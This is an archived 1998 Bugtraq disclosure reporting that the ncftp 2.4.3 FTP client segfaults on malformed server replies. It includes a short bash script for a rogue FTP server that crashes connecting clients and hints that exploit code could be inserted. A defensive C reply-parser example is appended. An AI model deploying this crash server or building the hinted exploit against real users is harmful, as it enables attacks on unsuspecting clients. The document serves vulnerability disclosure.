Bugtraq mailing list archives

ncftp 2.4.3 bug


From: paul () BOEHM ORG (Paul Boehm)
Date: Sun, 21 Jun 1998 00:52:33 +0200


Hi,

i think i've found a bug in ncftp 2.4.3 (latest stable release)...
if you connect to an ftp server that responds with something like the
shit below, ncftp 2.4.3 segfaults. i think this is exploitable,
but had no time/motivation to look further into it.

probably this isn't very dangerous anyway cause
your victim needs to connect willingly, and using ncftp to your server..
that won't happen very often unless
you've been talking with your victim before.

anyway i thought it may be a good idea to post it, so here it is:

--snip-- ncftpcrashd.sh
#!/bin/bash
# ncftp2.4.3 crash by infected () cia at
#   Start this using inetd. (port 21)

echo "331 hi, barbie.. wanna crash with me?"
echo "230 sure ken!"
echo "then hop in"
--snip--

every reply that looks like this works:
331 a
230 b
c[putting here some exploit code may work]

bye,
    paul

PS: i have no clue why this crashes ncftp... i haven't looked through
    ncftp's source, but maybe someone else will.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Name: Paul S. Boehm               ||  Freelance Security Consulter.
    Email: paul () is destructive org  ||  PGPkey available at:
       Url: http://paul.boehm.org/  ||  http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is no reason for any individual to have a computer in their home.
              --Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
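
A defensive counterpart to the server replies shown in the post, as an added example (not ncftp's code, and not a statement of why ncftp 2.4.3 crashes): a bounds-checked parser for one FTP reply line that rejects a line with no three-digit code, such as the third line the script sends. The names `ftp_reply`, `ftp_parse_reply_line`, `ftp_parse_reply` and `FTP_TEXT_MAX` are assumptions made for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define FTP_TEXT_MAX 128          /* assumed cap on stored reply text */

struct ftp_reply {
    int  code;                    /* 100..599, 0 if the line was rejected */
    int  more;                    /* 1 for "NNN-" (multi-line reply continues) */
    char text[FTP_TEXT_MAX];      /* always NUL-terminated, truncated if long */
};

/* Parse one server reply line of explicit length.
 * Returns 0 for "NNN text" or "NNN-text", -1 for anything else.
 * A caller should accept code-less lines only while a "NNN-" reply is open. */
int ftp_parse_reply_line(const char *line, size_t len, struct ftp_reply *out)
{
    size_t n;

    memset(out, 0, sizeof(*out));
    /* Strip trailing CR/LF so the checks below see only the payload. */
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;
    /* Three digits plus a separator are required; never index past len. */
    if (len < 4)
        return -1;
    if (line[0] < '1' || line[0] > '5' ||
        !isdigit((unsigned char)line[1]) || !isdigit((unsigned char)line[2]))
        return -1;
    if (line[3] != ' ' && line[3] != '-')
        return -1;

    out->code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    out->more = (line[3] == '-');
    n = len - 4;
    if (n > FTP_TEXT_MAX - 1)
        n = FTP_TEXT_MAX - 1;     /* truncate instead of overflowing */
    memcpy(out->text, line + 4, n);
    out->text[n] = '\0';
    return 0;
}

/* Convenience wrapper for NUL-terminated input. */
int ftp_parse_reply(const char *line, struct ftp_reply *out)
{
    return ftp_parse_reply_line(line, strlen(line), out);
}
```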


